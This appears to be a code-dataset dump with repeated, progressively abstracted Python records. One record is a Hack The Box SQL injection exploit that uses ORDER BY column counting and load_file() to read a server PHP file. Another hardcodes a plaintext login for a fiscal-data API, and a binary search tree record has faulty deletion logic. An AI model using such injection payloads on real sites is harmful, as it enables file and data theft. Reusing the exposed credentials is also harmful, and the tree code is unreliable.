None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right,temp.data,parent)\n \n return root\n \n def successor(self,root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n def inorder(self,root):\n if root is not None:\n self.inorder(root.left)\n print(root.data)\n self.inorder(root.right)\n \ndef main():\n Tree = tree()\n l =[50,30,20,40,70,60,80]\n for item in l:\n Tree.insert(Tree.root,item)\n print(Tree.delete(Tree.root,20,None))\n print(\"inorder after deleting 20:\")\n print(Tree.inorder(Tree.root))\n print(Tree.delete(Tree.root,30,None))\n print(Tree.delete(Tree.root,50,None))\n print(Tree.inorder(Tree.root))\n \nmain()\n \n \n \n \n \n \n", "class Node(object):\n\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.parent = None\n\n\nclass tree(object):\n\n def __init__(self):\n self.root = None\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n\n def successor(self, root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n\n def inorder(self, root):\n if root is not None:\n self.inorder(root.left)\n print(root.data)\n self.inorder(root.right)\n\n\ndef main():\n Tree = tree()\n l = [50, 30, 20, 40, 70, 60, 80]\n for item in l:\n Tree.insert(Tree.root, item)\n print(Tree.delete(Tree.root, 20, None))\n print('inorder after deleting 20:')\n print(Tree.inorder(Tree.root))\n print(Tree.delete(Tree.root, 30, None))\n print(Tree.delete(Tree.root, 50, None))\n print(Tree.inorder(Tree.root))\n\n\nmain()\n", "class Node(object):\n\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.parent = None\n\n\nclass tree(object):\n\n def __init__(self):\n self.root = None\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n\n def successor(self, root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n\n def inorder(self, root):\n if root is not None:\n self.inorder(root.left)\n print(root.data)\n self.inorder(root.right)\n\n\ndef main():\n Tree = tree()\n l = [50, 30, 20, 40, 70, 60, 80]\n for item in l:\n Tree.insert(Tree.root, item)\n print(Tree.delete(Tree.root, 20, None))\n print('inorder after deleting 20:')\n print(Tree.inorder(Tree.root))\n print(Tree.delete(Tree.root, 30, None))\n print(Tree.delete(Tree.root, 50, None))\n print(Tree.inorder(Tree.root))\n\n\n<code token>\n", "class Node(object):\n\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.parent = None\n\n\nclass tree(object):\n\n def __init__(self):\n self.root = None\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n\n def successor(self, root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n\n def inorder(self, root):\n if root is not None:\n self.inorder(root.left)\n print(root.data)\n self.inorder(root.right)\n\n\n<function token>\n<code token>\n", "class Node(object):\n <function token>\n\n\nclass tree(object):\n\n def __init__(self):\n self.root = None\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n\n def successor(self, root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n\n def inorder(self, root):\n if root is not None:\n self.inorder(root.left)\n print(root.data)\n self.inorder(root.right)\n\n\n<function token>\n<code token>\n", "<class token>\n\n\nclass tree(object):\n\n def __init__(self):\n self.root = None\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n\n def successor(self, root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n\n def inorder(self, root):\n if root is not None:\n self.inorder(root.left)\n print(root.data)\n self.inorder(root.right)\n\n\n<function token>\n<code token>\n", "<class token>\n\n\nclass tree(object):\n\n def __init__(self):\n self.root = None\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n\n def successor(self, root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n <function token>\n\n\n<function token>\n<code token>\n", "<class token>\n\n\nclass tree(object):\n <function token>\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n\n def successor(self, root):\n temp = root\n if root.right:\n while temp.left:\n temp = temp.left\n return temp\n <function token>\n\n\n<function token>\n<code token>\n", "<class token>\n\n\nclass tree(object):\n <function token>\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n\n def delete(self, root, data, parent):\n if root is None:\n return root\n if root.data < data:\n parent = root\n root.right = self.delete(root.right, data, parent)\n elif root.data > data:\n parent = root\n root.left = self.delete(root.left, data, parent)\n elif root is None or root.data != data:\n return False\n elif root.left is None and root.right is None:\n if data > parent.data:\n parent.right = None\n root = None\n else:\n parent.left = None\n root = None\n elif root.left is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.left\n elif root.right is None:\n if data > parent.data:\n parent.right = root.right\n root = parent.right\n else:\n parent.left = root.right\n root = parent.right\n else:\n temp = self.successor(root.right)\n root.data = temp.data\n root.right = self.delete(root.right, temp.data, parent)\n return root\n <function token>\n <function token>\n\n\n<function token>\n<code token>\n", "<class token>\n\n\nclass tree(object):\n <function token>\n\n def insert(self, root, value):\n if self.root == None:\n self.root = Node(value)\n elif value < root.data:\n if root.left is None:\n root.left = Node(value)\n else:\n self.insert(root.left, value)\n elif value > root.data:\n if root.right is None:\n root.right = Node(value)\n else:\n self.insert(root.right, value)\n return root\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<code token>\n", "<class token>\n\n\nclass tree(object):\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n\n<function token>\n<code token>\n", "<class token>\n<class token>\n<function token>\n<code token>\n" ]
false
82
88ec9484e934ce27b13734ca26f79df71b7677e6
import requests from bs4 import BeautifulSoup import sys import re if len(sys.argv)<2: print("Syntax : python %s <port>")%(str(sys.argv[0])) else: print('-'*55) print("HTB WEB-CHALLENGE coded by ZyperX [Freelance]") print('-'*55) r=requests.session() port=str(sys.argv[1]) url="http://docker.hackthebox.eu:" url=url+port uri="/portfolio.php?id=1" url=url+uri print("[*]SQLi Affected URI : %s")%(uri) print("[*]Counting Columns") for x in range(1,20): payload=(" order by %i --+")%(x) nurl=url+payload op=r.get(nurl) soup=BeautifulSoup(op.text,'html.parser') soup=soup.find('p') soup=str(soup) size=len(soup.split()) print("[*]Page size at order by %s : %s")%(x,size) if size < 36 : col= x-1 break print("-"*55) print("[*]Number of Columns : %d")%(col) print("[*]Web App Vulnerable with FILE PRIVILEGE SQLI") print("[*]Trying to read content of \'/var/www/html/administrat/panel.php\'") upayload=" union all select 1" for x in range(2,col+1): x=str(x) upayload=upayload+","+x upayload=upayload+" --+" url=url+upayload print("[*]Executing. : %s")%(url) op=r.get(url) op=str(op.text) if op.find("2"): print("[*]Column 2 is reflected"); print("[*]Injecting payloads in column 2...."); upayload=upayload.replace('2','load_file(\'/var/www/html/administrat/panel.php\')') url="http://docker.hackthebox.eu:"+port+uri+upayload print("[*]Excecuting : %s")%(url) op=r.get(url) op=str(op.text) op=re.search("HTB.*?<",op) op=str(op.group()) op=op.replace('<','') print("-"*55) print("[*]Flag : %s")%(op)
[ "import requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nif len(sys.argv)<2:\n print(\"Syntax : python %s <port>\")%(str(sys.argv[0]))\nelse:\n print('-'*55)\n print(\"HTB WEB-CHALLENGE coded by ZyperX [Freelance]\")\n print('-'*55)\n r=requests.session()\n port=str(sys.argv[1])\n url=\"http://docker.hackthebox.eu:\"\n url=url+port\n uri=\"/portfolio.php?id=1\"\n url=url+uri\n print(\"[*]SQLi Affected URI : %s\")%(uri)\n print(\"[*]Counting Columns\")\n for x in range(1,20):\n payload=(\" order by %i --+\")%(x)\n nurl=url+payload\n op=r.get(nurl)\n soup=BeautifulSoup(op.text,'html.parser')\n soup=soup.find('p')\n soup=str(soup)\n size=len(soup.split())\n print(\"[*]Page size at order by %s : %s\")%(x,size)\n if size < 36 :\n col= x-1\n break \n print(\"-\"*55)\n print(\"[*]Number of Columns : %d\")%(col)\n print(\"[*]Web App Vulnerable with FILE PRIVILEGE SQLI\")\n print(\"[*]Trying to read content of \\'/var/www/html/administrat/panel.php\\'\")\n upayload=\" union all select 1\"\n for x in range(2,col+1):\n x=str(x)\n upayload=upayload+\",\"+x\nupayload=upayload+\" --+\"\nurl=url+upayload\nprint(\"[*]Executing. : %s\")%(url)\nop=r.get(url)\nop=str(op.text)\nif op.find(\"2\"):\n print(\"[*]Column 2 is reflected\");\n print(\"[*]Injecting payloads in column 2....\");\nupayload=upayload.replace('2','load_file(\\'/var/www/html/administrat/panel.php\\')')\nurl=\"http://docker.hackthebox.eu:\"+port+uri+upayload\nprint(\"[*]Excecuting : %s\")%(url)\nop=r.get(url)\nop=str(op.text)\nop=re.search(\"HTB.*?<\",op)\nop=str(op.group())\nop=op.replace('<','')\nprint(\"-\"*55)\nprint(\"[*]Flag : %s\")%(op)\n", "import requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\nupayload = upayload + ' --+'\nurl = url + upayload\nprint('[*]Executing. : %s') % url\nop = r.get(url)\nop = str(op.text)\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\nupayload = upayload.replace('2',\n \"load_file('/var/www/html/administrat/panel.php')\")\nurl = 'http://docker.hackthebox.eu:' + port + uri + upayload\nprint('[*]Excecuting : %s') % url\nop = r.get(url)\nop = str(op.text)\nop = re.search('HTB.*?<', op)\nop = str(op.group())\nop = op.replace('<', '')\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n", "<import token>\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\nupayload = upayload + ' --+'\nurl = url + upayload\nprint('[*]Executing. : %s') % url\nop = r.get(url)\nop = str(op.text)\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\nupayload = upayload.replace('2',\n \"load_file('/var/www/html/administrat/panel.php')\")\nurl = 'http://docker.hackthebox.eu:' + port + uri + upayload\nprint('[*]Excecuting : %s') % url\nop = r.get(url)\nop = str(op.text)\nop = re.search('HTB.*?<', op)\nop = str(op.group())\nop = op.replace('<', '')\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n", "<import token>\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\n<assignment token>\nprint('[*]Executing. : %s') % url\n<assignment token>\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\n<assignment token>\nprint('[*]Excecuting : %s') % url\n<assignment token>\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n", "<import token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n" ]
false
83
cd2e03666a890d6e9ea0fcb45fe28510d684916d
import requests def squeezed (client_name): return client_name.replace('Индивидуальный предприниматель', 'ИП') def get_kkm_filled_fn(max_fill=80): ## возвращает список ККМ с заполнением ФН больше max_fill в % LOGIN_URL = 'https://pk.platformaofd.ru/auth/login' API_URL = 'https://pk.platformaofd.ru/api/monitoring' session = requests.Session() print('-= подключение к серверу =-') session.get(LOGIN_URL) login_data = { 'email': '[email protected]', 'password': 'smart620514', 'username': '[email protected]', 'phone':''} print('-= авторизация =-') session.post(LOGIN_URL, data=login_data) # запрос всех ККМ, кроме архивных (headers обязательно !) headers = {'Content-Type': 'application/json;charset=UTF-8'} payload = '{"badgeId":17,"type":"terminal","filterValues":[],"withArchive":0}' print('-= получение данных с сервера =-') r = session.post (API_URL, data=payload, headers=headers) data_from_api = r.json() all_kkm_list = data_from_api['result']['data'] kkm_quanity = len(all_kkm_list) print('-= обработка данных =-') kkm_with_filled_fn = [] for kkm in all_kkm_list: fn_used = int(kkm['fnSpaceUsed'].strip("'%")) if fn_used >= max_fill: kkm_with_filled_fn.append(kkm) return kkm_with_filled_fn max_fill = 80 x = get_kkm_filled_fn(max_fill) print(f'ККМ с заполненностью ФН выше {max_fill}%.') for k in x: print(f"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}")
[ "import requests\n\ndef squeezed (client_name):\n return client_name.replace('Индивидуальный предприниматель', 'ИП')\n\ndef get_kkm_filled_fn(max_fill=80):\n## возвращает список ККМ с заполнением ФН больше max_fill в %\n LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'\n API_URL = 'https://pk.platformaofd.ru/api/monitoring'\n\n session = requests.Session()\n print('-= подключение к серверу =-')\n session.get(LOGIN_URL)\n\n login_data = {\n 'email': '[email protected]',\n 'password': 'smart620514',\n 'username': '[email protected]',\n 'phone':''}\n\n print('-= авторизация =-')\n session.post(LOGIN_URL, data=login_data)\n\n # запрос всех ККМ, кроме архивных (headers обязательно !)\n headers = {'Content-Type': 'application/json;charset=UTF-8'}\n payload = '{\"badgeId\":17,\"type\":\"terminal\",\"filterValues\":[],\"withArchive\":0}'\n print('-= получение данных с сервера =-')\n r = session.post (API_URL, data=payload, headers=headers)\n\n data_from_api = r.json()\n all_kkm_list = data_from_api['result']['data']\n kkm_quanity = len(all_kkm_list)\n\n print('-= обработка данных =-')\n kkm_with_filled_fn = []\n for kkm in all_kkm_list:\n fn_used = int(kkm['fnSpaceUsed'].strip(\"'%\"))\n if fn_used >= max_fill:\n kkm_with_filled_fn.append(kkm)\n return kkm_with_filled_fn\n\n\nmax_fill = 80\nx = get_kkm_filled_fn(max_fill)\nprint(f'ККМ с заполненностью ФН выше {max_fill}%.')\nfor k in x:\n print(f\"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}\")\n\n", "import requests\n\n\ndef squeezed(client_name):\n return client_name.replace('Индивидуальный предприниматель', 'ИП')\n\n\ndef get_kkm_filled_fn(max_fill=80):\n LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'\n API_URL = 'https://pk.platformaofd.ru/api/monitoring'\n session = requests.Session()\n print('-= подключение к серверу =-')\n session.get(LOGIN_URL)\n login_data = {'email': '[email protected]', 'password': 'smart620514',\n 'username': '[email protected]', 'phone': ''}\n print('-= авторизация =-')\n session.post(LOGIN_URL, data=login_data)\n headers = {'Content-Type': 'application/json;charset=UTF-8'}\n payload = (\n '{\"badgeId\":17,\"type\":\"terminal\",\"filterValues\":[],\"withArchive\":0}')\n print('-= получение данных с сервера =-')\n r = session.post(API_URL, data=payload, headers=headers)\n data_from_api = r.json()\n all_kkm_list = data_from_api['result']['data']\n kkm_quanity = len(all_kkm_list)\n print('-= обработка данных =-')\n kkm_with_filled_fn = []\n for kkm in all_kkm_list:\n fn_used = int(kkm['fnSpaceUsed'].strip(\"'%\"))\n if fn_used >= max_fill:\n kkm_with_filled_fn.append(kkm)\n return kkm_with_filled_fn\n\n\nmax_fill = 80\nx = get_kkm_filled_fn(max_fill)\nprint(f'ККМ с заполненностью ФН выше {max_fill}%.')\nfor k in x:\n print(\n f\"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}\"\n )\n", "<import token>\n\n\ndef squeezed(client_name):\n return client_name.replace('Индивидуальный предприниматель', 'ИП')\n\n\ndef get_kkm_filled_fn(max_fill=80):\n LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'\n API_URL = 'https://pk.platformaofd.ru/api/monitoring'\n session = requests.Session()\n print('-= подключение к серверу =-')\n session.get(LOGIN_URL)\n login_data = {'email': '[email protected]', 'password': 'smart620514',\n 'username': '[email protected]', 'phone': ''}\n print('-= авторизация =-')\n session.post(LOGIN_URL, data=login_data)\n headers = {'Content-Type': 'application/json;charset=UTF-8'}\n payload = (\n '{\"badgeId\":17,\"type\":\"terminal\",\"filterValues\":[],\"withArchive\":0}')\n print('-= получение данных с сервера =-')\n r = session.post(API_URL, data=payload, headers=headers)\n data_from_api = r.json()\n all_kkm_list = data_from_api['result']['data']\n kkm_quanity = len(all_kkm_list)\n print('-= обработка данных =-')\n kkm_with_filled_fn = []\n for kkm in all_kkm_list:\n fn_used = int(kkm['fnSpaceUsed'].strip(\"'%\"))\n if fn_used >= max_fill:\n kkm_with_filled_fn.append(kkm)\n return kkm_with_filled_fn\n\n\nmax_fill = 80\nx = get_kkm_filled_fn(max_fill)\nprint(f'ККМ с заполненностью ФН выше {max_fill}%.')\nfor k in x:\n print(\n f\"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}\"\n )\n", "<import token>\n\n\ndef squeezed(client_name):\n return client_name.replace('Индивидуальный предприниматель', 'ИП')\n\n\ndef get_kkm_filled_fn(max_fill=80):\n LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'\n API_URL = 'https://pk.platformaofd.ru/api/monitoring'\n session = requests.Session()\n print('-= подключение к серверу =-')\n session.get(LOGIN_URL)\n login_data = {'email': '[email protected]', 'password': 'smart620514',\n 'username': '[email protected]', 'phone': ''}\n print('-= авторизация =-')\n session.post(LOGIN_URL, data=login_data)\n headers = {'Content-Type': 'application/json;charset=UTF-8'}\n payload = (\n '{\"badgeId\":17,\"type\":\"terminal\",\"filterValues\":[],\"withArchive\":0}')\n print('-= получение данных с сервера =-')\n r = session.post(API_URL, data=payload, headers=headers)\n data_from_api = r.json()\n all_kkm_list = data_from_api['result']['data']\n kkm_quanity = len(all_kkm_list)\n print('-= обработка данных =-')\n kkm_with_filled_fn = []\n for kkm in all_kkm_list:\n fn_used = int(kkm['fnSpaceUsed'].strip(\"'%\"))\n if fn_used >= max_fill:\n kkm_with_filled_fn.append(kkm)\n return kkm_with_filled_fn\n\n\n<assignment token>\nprint(f'ККМ с заполненностью ФН выше {max_fill}%.')\nfor k in x:\n print(\n f\"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}\"\n )\n", "<import token>\n\n\ndef squeezed(client_name):\n return client_name.replace('Индивидуальный предприниматель', 'ИП')\n\n\ndef get_kkm_filled_fn(max_fill=80):\n LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'\n API_URL = 'https://pk.platformaofd.ru/api/monitoring'\n session = requests.Session()\n print('-= подключение к серверу =-')\n session.get(LOGIN_URL)\n login_data = {'email': '[email protected]', 'password': 'smart620514',\n 'username': '[email protected]', 'phone': ''}\n print('-= авторизация =-')\n session.post(LOGIN_URL, data=login_data)\n headers = {'Content-Type': 'application/json;charset=UTF-8'}\n payload = (\n '{\"badgeId\":17,\"type\":\"terminal\",\"filterValues\":[],\"withArchive\":0}')\n print('-= получение данных с сервера =-')\n r = session.post(API_URL, data=payload, headers=headers)\n data_from_api = r.json()\n all_kkm_list = data_from_api['result']['data']\n kkm_quanity = len(all_kkm_list)\n print('-= обработка данных =-')\n kkm_with_filled_fn = []\n for kkm in all_kkm_list:\n fn_used = int(kkm['fnSpaceUsed'].strip(\"'%\"))\n if fn_used >= max_fill:\n kkm_with_filled_fn.append(kkm)\n return kkm_with_filled_fn\n\n\n<assignment token>\n<code token>\n", "<import token>\n<function token>\n\n\ndef get_kkm_filled_fn(max_fill=80):\n LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'\n API_URL = 'https://pk.platformaofd.ru/api/monitoring'\n session = requests.Session()\n print('-= подключение к серверу =-')\n session.get(LOGIN_URL)\n login_data = {'email': '[email protected]', 'password': 'smart620514',\n 'username': '[email protected]', 'phone': ''}\n print('-= авторизация =-')\n session.post(LOGIN_URL, data=login_data)\n headers = {'Content-Type': 'application/json;charset=UTF-8'}\n payload = (\n '{\"badgeId\":17,\"type\":\"terminal\",\"filterValues\":[],\"withArchive\":0}')\n print('-= получение данных с сервера =-')\n r = session.post(API_URL, data=payload, headers=headers)\n data_from_api = r.json()\n all_kkm_list = data_from_api['result']['data']\n kkm_quanity = len(all_kkm_list)\n print('-= обработка данных =-')\n kkm_with_filled_fn = []\n for kkm in all_kkm_list:\n fn_used = int(kkm['fnSpaceUsed'].strip(\"'%\"))\n if fn_used >= max_fill:\n kkm_with_filled_fn.append(kkm)\n return kkm_with_filled_fn\n\n\n<assignment token>\n<code token>\n", "<import token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n" ]
false
84
709f2425bc6e0b0b650fd6c657df6d85cfbd05fe
from django.shortcuts import render # Create your views here. def test_petite_vue(request): return render(request, 'petite_vue_app/test-form.html')
